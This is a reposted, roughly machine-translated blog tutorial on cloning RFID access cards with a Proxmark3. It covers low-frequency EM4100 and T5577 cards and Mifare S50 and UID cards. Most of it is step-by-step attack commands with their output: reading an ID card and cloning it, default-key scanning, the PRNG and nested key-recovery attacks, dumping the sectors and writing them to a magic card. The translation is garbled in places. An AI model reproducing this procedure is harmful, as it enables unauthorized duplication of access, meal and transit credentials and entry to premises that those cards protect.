Proxmark3 Easy to crack access card (reprint precious knowledge to prevent loss)

Reprinted to: https://lzy-wi.github.io/2018/07/26/proxmark3/

Please read the source author's article. If the link fails, please read this article.

Preface

                           . The real problem is not security, but people's hearts. Many things are designed without considering the safety problem at the beginning, because people's bad intentions force them to consider the safety problem.

Hardware preparation

Cracking devices

Proxmark3 Easy



The cracking tool is not necessarily Proxmark3 Easy, as long as it is also able to obtain and modify card data equipment, such as arc122u, arc122u can only read and modify high-frequency card, a little inadequate

Various cards

Prepare some ID S, IC cards


Isn't it all the same

How to distinguish ID card and IC card

  1. Illumination method

  1. Most circles are ID cards, most squares are IC cards
  2. NFC method
    Take a mobile phone with NFC function and open NFC. When the card is close to the mobile phone, it will ring IC card, but not ID card

Knowledge preparation

First of all, RFID is the technology used in the access card. For details, please see here - > Portal First of all, it can be divided into high frequency (13.56MHZ) and low frequency cards. In these two frequencies, it can be divided into many types of cards. Common cards are

type frequency Characteristic
Mifare S50 (M1 for short) high frequency The most common card, each card has a unique UID number, which can save modified data, common student card, meal card, bus card, access card
Mifare UltraLight (M0 for short) high frequency Low cost card, factory solidified UID, can store modified data, common metro card, bus card
Mifare UID (UID card for short) high frequency Variant version of M1 card, modifiable UID, foreign called China magic card, can be used to clone M1 S50 data
EM4XX (ID card for short) Low frequency Common curing ID card, factory curing ID, can only read but not write (low cost access card, community access card, parking lot access card)
T5577 (modifiable ID card for short) Low frequency It can be used to clone ID card. The factory is empty card. There are three areas in the card, which can also store data. A few three area sections set passwords
HID Prox Ⅱ (referred to as HID card) Low frequency Low frequency card commonly used in the United States, erasable, not common with other cards

high frequency

M1 S50 card

                   . The data size stored in M1 Kako is 8k, which is divided into 16 sectors. Each sector is divided into 4 blocks, each block is 16 bytes, and the access unit is block. Each sector has an independent set of passwords and access control. Each card has A unique 32-bit serial number. Block 0, 1 and 2 of each sector are data blocks for data storage, and block 3 is control block, including secret A, access control and password B
Block 0 of sector 0 of each card is used for Chunfang manufacturer code, which cannot be changed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Sector 0 03332801198804008500b42ef0bb6aa8 Block 0 / / manufacturer code, cannot be changed
	00000000000000000000000000000000 block 1 / / data block
	00000000000000000000000000000000 block 2 / / data block
	Ffffffffffffff078069ffffffffffffffff block 3 / / password A (6 bytes), storage control (4 bytes), password B (6 bytes)

Sector 1 00000000000000000000000000000000 block 4 / / sector 0 is slightly different. The structure of the other 15 sectors is exactly the same
	00000000000000000000000000000000 block 5
	00000000000000000000000000000000 block 6
	Ffffffffffffff078069ffffffffffffffffff block 7
		        .
		        .
		        .   
Sector 15 00000000000000000000000000000000 block 60
	00000000000000000000000000000000 block 61
	00000000000000000000000000000000 block 62
	Ffffffffffffff078069ffffffffffffffffff block 63

 

   the middle 4-byte control word is used to manage password permissions and set the functions of a password and B password. When it is not modified by default, all data can be read and written with a password. A password cannot be read out, B password can be read out with a password. The password is not necessarily readable and is determined by the control word.

M1 UID card

M1 UID card is a variant card of M1 S50 Carter system. It is exactly the same as M1 S50, but it has one more function, that is, the data of sector 0 block can be modified at will. Therefore, the UID number can be modified at will, and the manufacturer information can be modified at will. When the UID card modifies 0 sector 0 block data, it enters the factory mode by instructions. It can directly edit any data of the whole card, read and write the card without password, and it is not afraid to write bad card. Even if the wrong 0 block is written and the bad sector control word is written, it can be fixed at any time without affecting subsequent use.

FUID card

FUID card is optimized for UID card. The new card reading system can detect the UID card by detecting the response of the card to the special instructions, so it can deny the access of the UID card to achieve the function of shielding the duplicate card. FUID can modify Block 0, but it can only be modified once, and it can't be changed or reused due to wrong writing. After modification, it is exactly the same as M1 card, so it is difficult to be shielded for detection.

CUID card

The CUID card is optimized for the FUID card. The CUID card can modify 0 block repeatedly, but the difference between CUID card and UID card is that the UID card modifies 0 block by instruction, CUID uses the method of conventional password verification to write 0 block, and other sectors are the same as the standard M1 card. The disadvantage is that it may still be detected, and if the verification bit of UID number is accidentally written wrong, the card cannot be read, so it can only be scrapped.

Low frequency

ID card

   ID card is our common name. The full name of internal chip is EM4100 or EM41XX. Each card has a unique ID number, which cannot be rewritten.

T5577 card

T5577 card is a low-frequency card that can write data and can be encrypted. The most special thing is that writing ID number can be changed into ID card, writing hid number can be changed into hid card, writing Indala card number can be changed into Indala card. There are 8 blocks in t5577. Each block can only store 8 digits. Block 0 is used to set the card type and modulation mode, which determines whether the card is an ID card or a HID card. If you modify it at will, you will not be able to read the card. The last block is the data area when there is no encryption. After encryption, its data becomes a password. The structure is as follows

1
2
3
4
5
6
7
8
0x00148040  00000000000101001000000001000000 [0]
0xFF94C004  11111111100101001100000000000100 [1]
0xA5464942  10100101010001100100100101000010 [2]
0xFFFFF808  11111111111111111111100000001000 [3]
0x0001C000  00000000000000011100000000000000 [4]
0x0001C000  00000000000000011100000000000000 [5]
0x0001C000  00000000000000011100000000000000 [6]
0x0001C000  00000000000000011100000000000000 [7]

 

Crack

Cracking ID cards

Installation driver

Drive to download official website – > Portal
Before installing the driver file, you need to disable the driver installation mandatory signature, method – > Portal
Drive installation method
Right click on my computer - > Manage - > Device Manager - > right click on the device under the port - > Update Driver - > browse my computer - > select local - > install from disk - find the official driver file - > confirm
After the driver is installed, the image will be displayed. Remember the COM port

Hardware usage

Proxmark3 Easy

1 function button
 2 ABCD working status indicator
 3 USB interface
 4 power indicator
 5 low frequency card reading area
 6 high frequency card reading area

The    function button has the functions of exiting, canceling, stopping and strong firmware brushing. The ABCD indicator light is used as the basis for the operation of the device. Flashing indicates that the device is in progress, and completely off or constantly on indicates that the attack fails and waits. All off indicates that it has stopped running, and directly reseat the device.

Crack method

Read ID number of card → replace T5577 card → write ID number into card → finish
ID has no password and only card number, so you can copy as long as you know the card number.
Software package – > Password: f8q4
Open the official software firmware \ pm3-bin-2.5.0\win32(client+GUI)\Proxmark Tool.exe, select the COM port just driven and installed as indicated by the arrow, connect proxmark 3, connect to the computer, POW is on blue at the power indicator, FULL is on green, and CHR is flashing weak red.

Input hw tune test antenna resonance voltage in COMMAND TO SEND. If the high frequency is more than 5V and the low frequency is more than 10V, it can be used normally.

1
2
3
4
5
6
7
proxmark3> hw tune
Measuring antenna characteristics, please wait........          
# LF antenna: 22.27 V @   125.00 kHz          
# LF antenna: 31.76 V @   134.00 kHz          
# LF optimal: 31.76 V @   133.33 kHz          
# HF antenna: 20.17 V @    13.56 MHz          
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

 

Put the low-frequency ID card (access card) into the low-frequency card reading area, input lf search to obtain the ID card information, copy the card number, and use

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
proxmark3> lf search
Reading 30000 bytes from device memory
Data fetched          
Samples @ 8 bits/smpl, decimation 1:1           
NOTE: some demods output possible binary
  if it finds something that looks like a tag          
False Positives ARE possible
Checking for known tags:
EM410x pattern found:           
EM TAG ID      : 0000001450         //ID card number, copy this. If it's a HID card, it will display hid
Unique TAG ID  : 000000280A          
Possible de-scramble patterns          
HoneyWell IdentKey {          
DEZ 8          : 00005200          
DEZ 10         : 0000005200          
DEZ 5.5        : 00000.05200          
DEZ 3.5A       : 000.05200          
DEZ 3.5B       : 000.05200          
DEZ 3.5C       : 000.05200          
DEZ 14/IK2     : 00000000005200          
DEZ 15/IK3     : 000000000010250          
DEZ 20/ZK      : 00000000000002080010          
}
Other          : 05200_000_00005200          
Pattern Paxton : 1331792 [0x145250]          
Pattern 1      : 16652 [0x410C]          
Pattern Sebury : 5200 0 5200  [0x1450 0x0 0x1450]          
Valid EM410x ID Found! 			//Type of card

 

Put the T5577 card in the low-frequency card reading area and input the command lf hid clone 0000001450

1
2
3
4
proxmark3> lf hid clone 0000001450 
Cloning tag with ID 000001450          
proxmark3> 
proxmark3> #db# DONE!

 

The above commands can be found in the command tree at the top left. There are some buttons and commands on the left

The ID card is copied
The effect is as follows

Cracking IC cards

Thinking of IC card cracking

Get the key of any sector

  • PRNG vulnerability 0 sector key
  • Default password scan to get key
  • Sniff card reader and card interactive data to obtain key
  • Capture key after simulating M1 card swiping (card reader, poor compatibility)


Using MFOC vulnerability to find all sector keys with known sector keys

Read the card data into the computer with the cracked key

Write the data in the computer into the UID card
The first step is the most important and difficult one. Many IC cards are difficult to break the key of sector 0 and cannot go on to the next step. The default password scanning is lucky. The PRNG vulnerability attack probability is low. The latter two have high probability but high cost and are difficult to implement.
                               . At first, I used the English version of GUI according to the data. I didn't think it was easy to use it. Later, I used the original ecology. But I need to remember the command. If I forget the command, I will use the Chinese GUI to check the command▔▔▔ㄏ. The bug can't be found until the original ecology is used.
PRNG vulnerability obtains sector 0 key. 486 firmware does not drop the line. After 630 firmware, some cards can break. Some cards will drop the line and can't slide card will appear

Get 0 sector key

Far away, default password scan HF MF chk * 1? T

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
proxmark3> hf mf chk *1 ? t
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 4d3a99c351dd
chk default key[ 6] 1a982c7e459a
chk default key[ 7] d3f7d3f7d3f7
chk default key[ 8] 714c5c886e97
chk default key[ 9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--sector: 0, block:  3, key type:A, key count:13
		.
		.
		.
--sector:15, block: 63, key type:B, key count:13
Found valid key:[ffffffffffff]
Found keys have been transferred to the emulator memory

 

The password can be scanned out when it is the default password. If it is not the default password, try PRNG to obtain sector 0 key hf mf mifare

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
proxmark3>hf mf mifare
		.
		.
		.
uid(ea117dee) nt(431c39b0) par(0000000000000000) ks(030702000a030209) nr(800000005)


|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000005| 3 |  6  |0,0,0,0,0,0,0,0|
| 20 |00000025| 7 |  2  |0,0,0,0,0,0,0,0|
| 40 |00000045| 2 |  7  |0,0,0,0,0,0,0,0|
| 60 |00000065| 0 |  5  |0,0,0,0,0,0,0,0|
| 80 |00000085| a |  f  |0,0,0,0,0,0,0,0|
| a0 |000000a5| 3 |  6  |0,0,0,0,0,0,0,0|
| c0 |000000c5| 2 |  7  |0,0,0,0,0,0,0,0|
| e0 |000000e5| 9 |  c  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...         
p1:0 p2:0 p3:0 key:ffffffffffff
p1:58b87 p2:61ec p3:1 key:b4c98bd73e94
p1:c6a1b p2:d983 p3:2 key:576efc88ccc7
p1:ef844 p2:106dd p3:3 key:34ed3c6092e9
p1:f7e1e p2:10fd7 p3:4 key:2de06659d60e
p1:1239c0 p2:13fa0 p3:5 key:08b7558601a1
p1:12d1b3 p2:149c9 p3:6 key:00adbba1e330
key_count:7
------------------------------------------------------------------
Key found:ffffffffffff

Found valid key:ffffffffffff

 

Because the device is my little sister's, and the firmware is after 630, there will be many "DB" Mifare: can't select card, so you can't put all the code. Check the firmware command hw version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
proxmark3> hw version
#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect 2016-11-09 00:59:56
#db# os: /-suspect 2016-12-08 12:45:38
#db# HF FPGA image built on 2015/03/09 at 08:41:42
#db#   Modify by Willok(willok@163.com)

#db#      proxmark3.taobao.com


uC: AT91SAM7S256 Rev B
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory

 

Tip: the firmware version is based on the date of the firmware
We can test whether the key we get is right or not. The error will not return to the bottom line

1
2
3
4
proxmark3> hf mf chk 0 A ffffffffffff
chk key[ 0] ffffffffffff
--sector: 0, block:  0, key type:A, key count: 1
Found valid key:[ffffffffffff]

 

Know one and seek fifteen

After obtaining the key of sector 0, we can obtain the key of all sectors through MFOC vulnerability (100% success)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
proxmark3> hf mf nested 1 0 A ffffffffffff 			//0 is sector 0, key A
Testing known keys. Sector count=16
nested...
Time in nested: 4.330 (inf sec per key)

-----------------------------------------------
Iterations count: 0


|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|

 

Next export the key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
proxmark3> hf mf nested 1 0 A ffffffffffff d
Testing known keys. Sector count=16
nested...
Time in nested: 4.302 (inf sec per key)

-----------------------------------------------
Iterations count: 0


|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...

 

After export, a dumpkeys.bin file will be generated in the root directory, which contains the keys of 16 sectors (hexadecimal)

Derived data

After we get the password, we can export the data on the card to the computer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
	  .
	  .
	  .
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  0.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  0.
	  .
	  .
	  .
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 15.
Dumped 64 blocks (1024 bytes) to file dumpdata.bin

 

Also hex on

Because it is a test card, there is no data in it.

Write to UID card

Next, write the data into the UID card
Proxmark3 does not recognize bin file and needs to be converted to eml format
The first method is to run the following command to convert to eml format

1
2
3
4
5
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file EA117DEE.eml

-----Finished

 

The second method is to run the dump to EML.bat script to convert to EML format

Write to white card (UID card)

1
2
proxmark3> hf mf cload  dumpdata
Loaded from file: dumpdata.eml

 

The card is as like as two peas. The card is not visible. It can only be checked by reading. If you compare the data of the two cards, you can see that the data are exactly the same.
There is more than one way to crack IC card. The ability and equipment are limited. I will continue to learn in the future

38 original articles published, 10 praised, 100000 visitors+
Private letter follow

Keywords: emulator Mobile github

Added by cjcdadams on Sat, 07 Mar 2020 10:41:52 +0200